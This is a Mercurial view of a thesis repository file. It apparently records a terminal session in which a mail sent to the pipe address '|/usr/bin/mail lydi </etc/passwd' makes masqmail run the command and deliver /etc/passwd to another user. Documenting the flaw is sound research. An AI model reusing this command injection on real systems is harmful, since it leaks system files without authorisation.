Mercurial > docs > diploma

view hardcopies/bin-mail-attack.txt @ 198:402db7e2ecc4

Find changesets by keywords (author, files, the commit message), revision number or hash, or revset expression.
how to exploit masqmail :-(
author meillo@marmaro.de
date Wed, 31 Dec 2008 14:04:35 +0100
parents
children
line wrap: on
line source

test$ mail '|/usr/bin/mail lydi </etc/passwd'
Subject: the password file
hey hey jippee, here's your present :-)
.
Cc:
test$




lydi$ mail
Mail version 8.1.2 01/15/2001.  Type ? for help.
"/var/mail/lydi": 1 message 1 new
>N  1 test@dream         Wed Dec 31 11:12   46/1910
&
Message 1:
From <test@dream> Wed Dec 31 11:12:45 2008
Envelope-to: <lydi@dream>
To: lydi
From: <test@dream>
Date: Wed, 31 Dec 2008 11:12:45 +0100

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
.
.
.
test:x:1001:1002:test,,,:/home/test:/bin/bash
lydi:x:1002:1003:lydi,,,:/home/lydi:/bin/bash

&